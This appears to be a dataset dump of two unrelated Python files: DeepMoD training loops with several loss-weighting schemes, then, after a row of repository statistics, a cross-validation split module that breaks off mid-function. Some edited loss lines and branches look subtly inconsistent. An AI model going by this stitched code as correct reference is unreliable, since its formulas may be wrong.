_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test, s=model.s)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
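# The loss above resembles uncertainty-based task weighting (cf. Kendall et
# al., 2018): each term is scaled by exp(-s_i) with an additive +s_i penalty,
# so s_i learns a log-variance-like trade-off. A scalar sketch with made-up
# loss values (illustrative only):
def _demo_uncertainty_weighting():
    s = torch.zeros(2, requires_grad=True)  # one log-weight per loss term
    mse, reg = torch.tensor(0.5), torch.tensor(0.05)
    loss = 2 * torch.exp(-s[0]) * mse + torch.exp(-s[1]) * reg + s.sum()
    loss.backward()
    # d loss / d s_i = 1 - w_i * exp(-s_i) * term_i: large terms push s_i up,
    # which shrinks their effective weight exp(-s_i)
    return s.grad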
def train_gradnorm(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
alpha,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.cat([torch.mean((dt - theta @ coeff_vector)**2, dim=0)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
task_loss = (torch.exp(model.weights) * torch.stack((MSE, Reg), axis=1)).flatten() # weighted losses
loss = torch.sum(task_loss)
if iteration == 0: # Getting initial loss
ini_loss = task_loss.data
if torch.any(task_loss.data > ini_loss):
ini_loss[task_loss.data > ini_loss] = task_loss.data[task_loss.data > ini_loss]
# Getting original grads
optimizer.zero_grad()
loss.backward(retain_graph=True)
model.weights.grad.data = model.weights.grad.data * 0.0 # setting weight grads to zero
# Getting Grads to normalize
G = torch.tensor([torch.norm(torch.autograd.grad(loss_i, list(model.parameters())[-2], retain_graph=True, create_graph=True)[0], 2) for loss_i in task_loss]).to(data.device)
G_mean = torch.mean(G)
# Calculating relative losses
rel_loss = task_loss / ini_loss
inv_train_rate = rel_loss / torch.mean(rel_loss)
# Calculating grad norm loss
grad_norm_loss = torch.sum(torch.abs(G - G_mean * inv_train_rate ** alpha))
# Setting grads
model.weights.grad = torch.autograd.grad(grad_norm_loss, model.weights)[0]
# do a step with the optimizer
optimizer.step()
# renormalize
normalize_coeff = task_loss.shape[0] / torch.sum(model.weights)
model.weights.data = torch.log(torch.exp(model.weights.data) * normalize_coeff)
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
                loss_test = model.weights @ torch.stack((MSE_test, Reg_test), axis=0)
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test, w=model.weights)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
def train_scaled(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
loss = torch.sum(MSE + torch.exp(- MSE.data / Reg.data) * Reg)
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum( MSE_test + Reg_test)
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
def train_wscaled(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
for iteration in np.arange(0, max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
with torch.no_grad():
w_Reg = 1 / torch.sum(MSE.data)
w_MSE = 1 - w_Reg
loss = torch.sum(w_MSE * MSE + w_Reg * Reg)
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum(w_MSE * MSE_test + w_Reg * Reg_test)
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
board.write(iteration, loss, MSE, Reg, l1_norm, model.constraint_coeffs(sparse=True, scaled=True), model.constraint_coeffs(sparse=True, scaled=False), estimator_coeff_vectors, MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test, w_MSE=w_MSE, w_Reg=w_Reg)
# ================== Sparsity update =============
# Updating sparsity and or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
def train_bayes(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
    for iteration in range(max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
        # Student-t likelihood: v and s0 are the prior degrees of freedom and
        # scale; both are updated with the current residuals before evaluating
        # the negative log-likelihood of the training targets.
        v = torch.tensor(10.).to(data.device)
        s0 = torch.tensor(1e-2).to(data.device)
        n = n_train
        v_MSE = v + n
        s0_MSE = (v * s0 + torch.sum((target_train - prediction)**2)) / (v + n)
        t = StudentT(v_MSE, loc=prediction, scale=s0_MSE)
        loss = -torch.mean(t.log_prob(target_train))
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum(MSE_test + Reg_test)
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
            board.write(iteration, loss, MSE, Reg, l1_norm,
                        model.constraint_coeffs(sparse=True, scaled=True),
                        model.constraint_coeffs(sparse=True, scaled=False),
                        estimator_coeff_vectors,
                        MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test)
# ================== Sparsity update =============
        # Updating sparsity and/or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
def train_LL(model: DeepMoD,
data: torch.Tensor,
target: torch.Tensor,
optimizer,
sparsity_scheduler,
split: float = 0.8,
log_dir: Optional[str] = None,
max_iterations: int = 10000,
write_iterations: int = 25,
**convergence_kwargs) -> None:
"""Stops training when it reaches minimum MSE.
Args:
model (DeepMoD): [description]
data (torch.Tensor): [description]
target (torch.Tensor): [description]
optimizer ([type]): [description]
sparsity_scheduler ([type]): [description]
log_dir (Optional[str], optional): [description]. Defaults to None.
max_iterations (int, optional): [description]. Defaults to 10000.
"""
start_time = time.time()
board = Tensorboard(log_dir) # initializing tb board
# Splitting data, assumes data is already randomized
n_train = int(split * data.shape[0])
n_test = data.shape[0] - n_train
data_train, data_test = torch.split(data, [n_train, n_test], dim=0)
target_train, target_test = torch.split(target, [n_train, n_test], dim=0)
# Training
print('| Iteration | Progress | Time remaining | Loss | MSE | Reg | L1 norm |')
    for iteration in range(max_iterations + 1):
# ================== Training Model ============================
prediction, time_derivs, thetas = model(data_train)
MSE = torch.mean((prediction - target_train)**2, dim=0) # loss per output
Reg = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs, thetas, model.constraint_coeffs(scaled=False, sparse=True))])
        s_MSE = MSE
        s_Reg = (MSE * Reg) / (MSE + Reg)
        # The original weighted both terms by 1 / s_MSE and never used s_Reg;
        # the log-likelihood form suggests the regression term should be scaled
        # by 1 / s_Reg, and summing keeps the loss scalar for multi-output models.
        loss = torch.sum(1 / s_MSE * MSE + 1 / s_Reg * Reg + torch.log(s_MSE * s_Reg))
# Optimizer step
optimizer.zero_grad()
loss.backward()
optimizer.step()
if iteration % write_iterations == 0:
# ================== Validation costs ================
prediction_test, coordinates = model.func_approx(data_test)
time_derivs_test, thetas_test = model.library((prediction_test, coordinates))
with torch.no_grad():
MSE_test = torch.mean((prediction_test - target_test)**2, dim=0) # loss per output
Reg_test = torch.stack([torch.mean((dt - theta @ coeff_vector)**2)
for dt, theta, coeff_vector in zip(time_derivs_test, thetas_test, model.constraint_coeffs(scaled=False, sparse=True))])
loss_test = torch.sum(MSE_test + Reg_test)
# ====================== Logging =======================
_ = model.sparse_estimator(thetas, time_derivs) # calculating l1 adjusted coeffs but not setting mask
estimator_coeff_vectors = model.estimator_coeffs()
l1_norm = torch.sum(torch.abs(torch.cat(model.constraint_coeffs(sparse=True, scaled=True), dim=1)), dim=0)
progress(iteration, start_time, max_iterations, loss.item(),
torch.sum(MSE).item(), torch.sum(Reg).item(), torch.sum(l1_norm).item())
            board.write(iteration, loss, MSE, Reg, l1_norm,
                        model.constraint_coeffs(sparse=True, scaled=True),
                        model.constraint_coeffs(sparse=True, scaled=False),
                        estimator_coeff_vectors,
                        MSE_test=MSE_test, Reg_test=Reg_test, loss_test=loss_test)
# ================== Sparsity update =============
        # Updating sparsity and/or convergence
if iteration % write_iterations == 0:
sparsity_scheduler(iteration, torch.sum(MSE_test), model, optimizer)
if sparsity_scheduler.apply_sparsity is True:
with torch.no_grad():
model.constraint.sparsity_masks = model.sparse_estimator(thetas, time_derivs)
break
board.close()
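# Hedged usage sketch (not part of the original file): the constructor
# arguments below are illustrative placeholders; only train()'s signature is
# taken from this module.
# from torch.optim import Adam
# model = DeepMoD(...)                                  # assumed setup
# optimizer = Adam(model.parameters(), lr=1e-3)
# train(model, data, target, optimizer, sparsity_scheduler,
#       split=0.8, log_dir='runs/demo', max_iterations=5000)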
| 50.939292
| 272
| 0.590956
| 3,475
| 30,207
| 4.947914
| 0.052374
| 0.024194
| 0.042747
| 0.029313
| 0.912062
| 0.905141
| 0.898046
| 0.892695
| 0.892695
| 0.892695
| 0
| 0.012522
| 0.270302
| 30,207
| 593
| 273
| 50.939292
| 0.767535
| 0.199556
| 0
| 0.838798
| 0
| 0
| 0.025596
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019126
| false
| 0
| 0.021858
| 0
| 0.040984
| 0.019126
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62fd5862c04a77ded048ffb3a3f2ab438c9a6254
| 32,645
|
py
|
Python
|
src/models/cross_validation.py
|
LeanderLXZ/intelligent-analysis-of-financial-statements
|
38bab5bea3c2f22f71020020c8325f6b6b014853
|
[
"Apache-2.0"
] | null | null | null |
src/models/cross_validation.py
|
LeanderLXZ/intelligent-analysis-of-financial-statements
|
38bab5bea3c2f22f71020020c8325f6b6b014853
|
[
"Apache-2.0"
] | null | null | null |
src/models/cross_validation.py
|
LeanderLXZ/intelligent-analysis-of-financial-statements
|
38bab5bea3c2f22f71020020c8325f6b6b014853
|
[
"Apache-2.0"
] | 1
|
2021-12-15T02:09:16.000Z
|
2021-12-15T02:09:16.000Z
|
import numpy as np
from math import ceil
from models import utils
from config import cfg
from sklearn.model_selection import StratifiedShuffleSplit
from sklearn.model_selection import RepeatedKFold
from sklearn.model_selection import GroupKFold
class CrossValidation(object):
"""
Cross Validation
"""
def __init__(self):
self.trained_cv = []
@staticmethod
def random_split(x, y, w, e, n_valid=None, n_cv=None, n_era=None, cv_seed=None):
test_size = n_valid / n_era
valid_era = []
ss_train = StratifiedShuffleSplit(n_splits=n_cv, test_size=test_size, random_state=cv_seed)
cv_count = 0
for train_index, valid_index in ss_train.split(x, y):
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
@staticmethod
def sk_k_fold(x, y, w, n_splits=None, n_cv=None, cv_seed=None):
if cv_seed is not None:
np.random.seed(cv_seed)
if n_cv % n_splits != 0:
raise ValueError('n_cv must be an integer multiple of n_splits!')
n_repeats = int(n_cv / n_splits)
era_k_fold = RepeatedKFold(n_splits=n_splits, n_repeats=n_repeats, random_state=cv_seed)
cv_count = 0
for train_index, valid_index in era_k_fold.split(x, y):
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, x_valid, y_valid, w_valid
@staticmethod
def sk_group_k_fold(x, y, e, n_cv=None):
era_k_fold = GroupKFold(n_splits=n_cv)
cv_count = 0
for train_index, valid_index in era_k_fold.split(x, y, e):
# Training data
x_train = x[train_index]
y_train = y[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, x_valid, y_valid
@staticmethod
def sk_group_k_fold_with_weight(x, y, w, e, n_cv=None):
era_k_fold = GroupKFold(n_splits=n_cv)
cv_count = 0
for train_index, valid_index in era_k_fold.split(x, y, e):
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, x_valid, y_valid, w_valid
@staticmethod
def era_k_fold(x, y, w, e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, era_list=None):
if cv_seed is not None:
np.random.seed(cv_seed)
n_traverse = n_era // n_valid
n_rest = n_era % n_valid
if n_rest != 0:
n_traverse += 1
if n_cv % n_traverse != 0:
            raise ValueError('n_cv must be an integer multiple of n_traverse!')
n_epoch = n_cv // n_traverse
trained_cv = []
cv_count = 0
for epoch in range(n_epoch):
if era_list is None:
era_list = range(0, n_era)
era_idx = [era_list]
if n_rest == 0:
for i in range(n_traverse):
                    # Choose eras that have not been used yet
if trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
if set(valid_era) != set(era_idx[i]):
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(era_list, n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
# Generate era set for next choosing
if i != n_traverse - 1:
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
# Generate train-validation split index
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
            # n_era is not an integer multiple of n_valid
else:
for i in range(n_traverse):
if i != n_traverse - 1:
if trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
else:
era_idx_else = [t for t in list(era_list) if t not in era_idx[i]]
valid_era = era_idx[i] + list(np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = era_idx[i] + list(
np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
# Validation data
x_valid = x[valid_index]
y_valid = y[valid_index]
w_valid = w[valid_index]
e_valid = e[valid_index]
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield x_train, y_train, w_train, e_train, x_valid, y_valid, w_valid, e_valid, valid_era
@staticmethod
def era_k_fold_split(e, n_valid=None, n_cv=None, n_era=None, cv_seed=None, era_list=None):
if cv_seed is not None:
np.random.seed(cv_seed)
n_traverse = n_era // n_valid
n_rest = n_era % n_valid
if n_rest != 0:
n_traverse += 1
if n_cv % n_traverse != 0:
            raise ValueError('n_cv must be an integer multiple of n_traverse!')
n_epoch = n_cv // n_traverse
trained_cv = []
cv_count = 0
for epoch in range(n_epoch):
if era_list is None:
era_list = range(0, n_era)
era_idx = [era_list]
if n_rest == 0:
for i in range(n_traverse):
                    # Choose eras that have not been used yet
if trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
if set(valid_era) != set(era_idx[i]):
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(era_list, n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
# Generate era set for next choosing
if i != n_traverse - 1:
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
# Generate train-validation split index
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield train_index, valid_index
            # n_era is not an integer multiple of n_valid
else:
for i in range(n_traverse):
if i != n_traverse - 1:
if trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield train_index, valid_index
else:
era_idx_else = [t for t in list(range(0, n_era)) if t not in era_idx[i]]
valid_era = era_idx[i] + list(np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
while any(set(valid_era) == i_cv for i_cv in trained_cv):
print('This CV split has been chosen, choosing another one...')
valid_era = era_idx[i] + list(
np.random.choice(era_idx_else, n_valid - n_rest, replace=False))
train_index = []
valid_index = []
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
trained_cv.append(set(valid_era))
cv_count += 1
utils.print_cv_info(cv_count, n_cv)
yield train_index, valid_index
def era_k_fold_for_stack(self, x, y, w, e, x_g, n_valid=None, n_cv=None,
n_era=None, cv_seed=None, return_train_index=False):
if cv_seed is not None:
np.random.seed(cv_seed)
n_traverse = n_era // n_valid
n_rest = n_era % n_valid
if n_rest != 0:
n_traverse += 1
if n_cv % n_traverse != 0:
            raise ValueError('n_cv must be an integer multiple of n_traverse!')
n_epoch = n_cv // n_traverse
cv_count = 0
for epoch in range(n_epoch):
era_idx = [list(range(0, n_era))]
if n_rest == 0:
for i in range(n_traverse):
                    # Choose eras that have not been used yet
if self.trained_cv:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
while any(set(valid_era) == i_cv for i_cv in self.trained_cv):
print('This CV split has been chosen, choosing another one...')
if set(valid_era) != set(era_idx[i]):
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
else:
valid_era = np.random.choice(range(0, n_era), n_valid, replace=False)
else:
valid_era = np.random.choice(era_idx[i], n_valid, replace=False)
# Generate era set for next choosing
if i != n_traverse - 1:
era_next = [rest for rest in era_idx[i] if rest not in valid_era]
era_idx.append(era_next)
train_index = []
valid_index = []
# Generate train-validation split index
for ii, ele in enumerate(e):
if ele in valid_era:
valid_index.append(ii)
else:
train_index.append(ii)
np.random.shuffle(train_index)
np.random.shuffle(valid_index)
# Training data
x_train = x[train_index]
y_train = y[train_index]
w_train = w[train_index]
e_train = e[train_index]
x_g_train = x_g[train_index]
